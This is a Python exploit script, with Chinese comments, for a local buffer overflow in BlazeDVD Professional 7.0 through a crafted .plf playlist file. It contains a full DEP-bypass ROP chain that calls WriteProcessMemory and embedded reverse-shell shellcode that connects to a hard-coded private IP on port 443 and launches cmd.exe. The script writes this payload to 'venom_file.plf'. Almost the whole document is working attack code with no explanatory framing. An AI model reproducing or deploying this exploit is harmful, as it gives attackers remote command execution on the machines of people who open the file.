import sys, os, time
from struct import pack
def rop() :
### ###
# 软件名称: BlazeDVD Professional 7.0 (load *.plf) Local Buffer Overflow (DEP Bypass)
# 利用作者: 0x0dee
# 使用模块: MediaPlayerCtrl.dll
# 坏字符: 0x00 0x0a 0x1a
# 绕过DEP使用的API: WriteProcessMemory(WPM)
# WPM在导入表中的地址: 0x640542dc
# 代码洞地址: 0x64050dc0
# 可写地址: 0x6406efd0
### ###
ropbuf =[
0x6402c95f, # nop ; ret ;
0xffffffff, # offset pad for esp
0xffffffff,
0xffffffff,
0xffffffff,
## dereference WriteProcessMemory in import table
0x640499a7, # pop eax ; ret ;
0x640542dc, ## WPM import table address
0x64039d96, # mov eax, dword [eax] ; ret ;
0x64046c72, # xchg eax, edx ; ret ;
## get call_struct address = esp + 204
## WPM call address = dword [640542dc]
0x64025874, # push esp ; pop esi ; ret ;
0x6404bf22, # mov eax, esi ; pop esi ; ret ;
0xffffffff, ## pop to esi
0x640502d4, # pop ecx ; ret ;
0xfffffdfc, ## 0 - 204
0x6403ed14, # sub eax, ecx ; ret ;
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
## return address = 64050dc0
0x64040233, # inc eax ; ret ;
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x6405147a, # pop edx ; ret ;
0x64050dc0, ## code cave for shellcode
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
# hProcess = -1
0x64040233, # inc eax ; ret ;
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x6405147a, # pop edx ; ret ;
0xffffffff, ## -1 for hProcess
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
# lpBaseaddress = 0x64050dc0
0x64040233, # inc eax ; ret ;
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x6405147a, # pop edx ; ret ;
0x64050dc0, ## code cave
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
# lpBuffer = offset of call_struct + 0x30
0x64046c72, # xchg eax, edx ; ret ;
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x6401a3ac, # mov eax, edx ; ret ;
0x640502d4, # pop ecx ; ret ;
0xffffffd0, ## -0x30
0x6403ed14, # sub eax, ecx ; ret ;
0x64046c72, # xchg eax, edx ; ret ;
0x6401a3ac, # mov eax, edx ; ret ;
0x6404c6ff, # pop esi ; ret ;
0xffffffd4, ## -0x2c
0x64041797, # add eax, esi ; pop esi ; ret ;
0xffffffff, ## for pop esi
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
# nSize = 0x220
0x64040233, # inc eax ; ret ;
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x64046c72, # xchg eax, edx ; ret ;
0x64053bf1, # xor eax, eax ; ret ;
0x640502d4, # pop ecx ; ret ;
0xfffffde0, ## -0x220
0x6403ed14, # sub eax, ecx ; ret ;
0x64046c72, # xchg eax, edx ; ret ;
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
# [OUT] *lpNumberOfBytesWrittten = 0x6406efd0
0x64040233, # inc eax ; ret ;
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x64040233, # inc eax ; ret ;
0x6405147a, # pop edx ; ret ;
0x6406efd0, ## .data writable address
0x640506f4, # pop ecx ; ret ;
0x6406efd0, ## Writable address
0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
# call WPM
0x6403ea41, # sub eax, 0x20 ; pop ebx ; ret ;
0xffffffff, ## pop to ebx
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0xffffffff, ## for retn 0x0C
0x64039f50, # add eax, 0x08 ; ret ;
0x64032313 # push eax ; pop esp ; ret ;
# 0x6401a3ac, # mov eax, edx ; ret ;
# 0x6401ccc0, # mov eax, ecx ; ret ;
# 0x64048d30, # mov eax, ebx ; pop esi ; pop ebx ; ret ;
# 0x64010341, # add al, 0xFF ; push edx ; pop eax ; pop esi ; ret ;
# 0x64016676, # xchg eax, ebx ; ret ;
]
return b''.join(pack("<L", _) for _ in ropbuf)
bufferSize = 0xe10 # 0xf58
# eip offset : 0n260
# esp offest : 0n280
# badchars : 0x00 0x0a 0x1a
buffer = b""
offsetOfEIP = b"A" * 260
ropbuf = rop()
buffer += offsetOfEIP + ropbuf
# shellcode size: 0x151 (337)
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebN\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cV\x8b^\x08\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18\x8bG \x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca\x02\x01\xc2\xeb\xf4\xeb)^\x8b6\xeb\xbd;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89D$ ^aYZQ\xff\xe0\xb8\xb4\xb3\xff\xfe\xf7\xd8Ph32.DhWS2_Thhz\xc4v\xffU\x04\x89\xe01\xc9f\xb9\x90\x05)\xc8P1\xc0f\xb8\x02\x02Ph\x96 \x9e\xcc\xffU\x041\xc0PPP\xb0\x06P,\x05P@Phf ^\x81\xffU\x04\x89\xc61\xc0PPh\xc0\xa8\x1f\x03f\xb8\x01\xbb\xc1\xe0\x10f\x83\xc0\x02PT_1\xc0PPPP\x04\x10PWVh\x95 ^W\xffU\x04VVV1\xc0\x8dH\rP\xe2\xfd\xb0DPT_f\xc7G,\x01\x01\xb8\x9b\x87\x9a\xff\xf7\xd8Phcmd.\x89\xe3\x89\xe01\xc9f\xb9\x90\x03)\xc8PW1\xc0PPP@PHPPSPh\xc7(\xaa\x0b\xffU\x041\xc9Qj\xffh\xd2U\xa9.\xffU\x04'
offsetOfshellcode = b"\x90" * (0x204 + 0x30 - len(ropbuf) + 0x40)
buffer += offsetOfshellcode + shellcode
print("[ ] rop size "+ hex(len(ropbuf)))
buffer += b"Z" * (bufferSize - len(buffer))
file = open("venom_file.plf", "wb")
file.write(buffer)
print("[+] Write buffer " + str(len(buffer)) + " bytes.")
file.close()